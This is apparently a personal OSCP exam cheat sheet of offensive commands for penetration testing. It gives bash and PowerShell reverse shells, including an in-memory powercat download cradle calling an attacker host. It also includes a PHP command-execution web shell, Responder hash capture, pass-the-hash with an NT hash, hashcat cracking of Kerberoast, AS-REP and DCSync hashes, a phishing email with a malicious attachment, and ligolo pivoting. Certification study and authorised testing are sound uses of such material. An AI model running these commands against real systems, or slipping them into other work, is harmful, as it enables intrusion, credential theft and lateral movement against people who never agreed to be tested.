OSCP Commands Cheat Sheet

HOST IP - HOST PORT -

Reverse shells - /usr/share/webshells/

Enumeration

Port scanning from a Windows host (PowerShell one-liner):

1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("<HOST_IP>", $_)) "TCP port $_ is open"} 2>$null

SMB Enumeration

NetBIOS Info

sudo nbtscan -r <HOST_IP_RANGE>

SMB shares within a Windows environment (shares hosted on dc01)

net view \\dc01 /all
  • Administrative shares are the ones ending with a dollar sign ($)

To get a list of shares (unauthenticated, using a non-existent user)

netexec smb <HOST_IP> -u 'DOesnotExist' -p '' --shares

Connect to a share with smbclient using an NT hash instead of a password

smbclient \\\\192.168.50.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b

SMTP Enumeration

To send an email with an attachment using swaks (the --header value must be in "Name: value" form, e.g. a Subject header):

sudo swaks -t test@supermagicorg.com --from test@supermagicorg.com --attach @config.Library-ms --server 192.168.212.199 --body @body.txt --header "Subject: Configuration Update" --suppress-data -ap

Web Enumeration

gobuster dir -u http://<HOST_IP> -w /usr/share/wordlists/dirb/common.txt -t 5

XSS test characters (check which ones are reflected unencoded):

< > ' " { } ;

PHP debug snippet:

<?php phpinfo(); ?>

PHP RCE snippet:

<?php echo system($_REQUEST['cmd']); ?>

To pass the parameter:

<URL>&cmd=ls

Directory Traversal

  • Linux - check for /etc/passwd
  • Windows - check for C:\Windows\System32\drivers\etc\hosts, as it is readable by all users

Shells

Web shells shipped with Kali Linux

cd /usr/share/webshells/

Bash Reverse Shell

bash -i >& /dev/tcp/<HOST_IP>/4444 0>&1

To get the same Bash reverse shell via bash -c (when the current shell is not bash)

bash -c "bash -i >& /dev/tcp/<HOST_IP>/4444 0>&1"

Other Commands

Enable the built-in Windows Telnet client

dism /online /Enable-Feature /FeatureName:TelnetClient

INetSim fake files path:

/var/lib/inetsim/http/fakefiles

Responder - to capture Windows (Net-NTLMv2) hashes on the given interface

sudo responder -I tap0

Hashcat

NTLM Password Cracking

hashcat -m 1000 user.hash rockyou.txt -r /usr/share/doc/hashcat-doc/rules/best64.rule --force

Net-NTLMv2 hashes (from Responder)

hashcat -m 5600 user.hash rockyou.txt --force

Hashcat mode number for Atlassian (PBKDF2-HMAC-SHA1) hashes

hashcat -m 12001 hashes.txt /usr/share/wordlists/fasttrack.txt

Hashcat command to crack AS-REP roast hashes

sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Hashcat command to crack Kerberoast (TGS) hashes of service accounts

sudo hashcat -m 13100 hash.kerberoast rockyou.txt -r /usr/share/doc/hashcat-doc/rules/best64.rule --force

Hashcat command to crack NTLM hashes obtained via a DCSync attack

hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

crunch for custom wordlist generation (example: 6-character words starting with "Lab" followed by three digits, % = digit)

crunch 6 6 -t Lab%%% > wordlist

Windows:

Copy powercat to the current directory:

cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .

To check whether the current shell is PowerShell or cmd

(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell

Download powercat in memory and start a reverse shell

IEX (New-Object System.Net.Webclient).DownloadString("http://<HOST_IP>/powercat.ps1");powercat -c <HOST_IP> -p <HOST_PORT> -e powershell

Port Forwarding

Ligolo - https://arth0s.medium.com/ligolo-ng-pivoting-reverse-shells-and-file-transfers-6bfb54593fa5

Ligolo: the agent runs on the pivot machine, the proxy on your own machine

Creating the tunnel interface on your own machine

sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up

On your own machine (start the proxy):

./proxy -selfcert

On the pivot machine (Linux):

wget <HOST_IP>/agent
./agent -connect <HOST_IP>:11601 -ignore-cert

On the pivot machine (Windows):

cd 'C:\Windows\Temp\'
iwr -uri http://<LOCAL_IP>/agent.exe -Outfile agent.exe

On your machine (in the ligolo-ng proxy console):

ligolo-ng >> session
# select the session
ligolo-ng >> ifconfig

Add a route for the DMZ network through the tunnel on your own machine

sudo ip route add <IP ADDR RANGE OF DMZ> dev ligolo

On your own machine, start the tunnel:

ligolo-ng >> start

To add a listener on the pivot machine that forwards back through the existing tunnel, type the following:

ligolo-ng >> listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp

To get a file (e.g. a zip) back via an impacket SMB server on your own machine

listener_add --addr 0.0.0.0:4445 --to 127.0.0.1:445 --tcp

For a web server (port 8080 on the DMZ machine forwarded to port 80 on our local machine)

listener_add --addr 0.0.0.0:8080 --to 127.0.0.1:80 --tcp

For starting a listener for the agent port (11601), so a further agent can reach the proxy through the pivot

listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp

This means: on the DMZ/pivot machine, listen on port 1234 and forward that traffic to port 4321 on our machine.

To further add tunnels - https://medium.com/@issam.qsous/mastering-multi-pivot-strategies-unleashing-ligolo-ngs-power-double-triple-and-even-quadruple-dca6b24c404c

To reach the pivot machine's own local ports (its 127.0.0.1), use the following magic IP:

sudo ip route add 240.0.0.1/32 dev ligolo

Access the machine at 240.0.0.1

For every new tunnel:
  • Transfer the ligolo agent to that machine
  • Connect that agent to the previous ligolo machine's IP
  • Add a new tunnel interface

sudo ip tuntap add user kali mode tun ligolo1
sudo ip link set ligolo1 up

Add a new route for that network through the new interface

sudo ip route add <IP ADDR RANGE OF Prev Ligolo machine> dev ligolo1

Cleanup of route table

ip route
sudo ip route del <IP route addr>

Cleanup of Tunnels

sudo ifconfig ligolo down
sudo ip link set ligolo down
sudo ip link delete ligolo

# For the ligolo1 tunnel
sudo ifconfig ligolo1 down
sudo ip link set ligolo1 down
sudo ip link delete ligolo1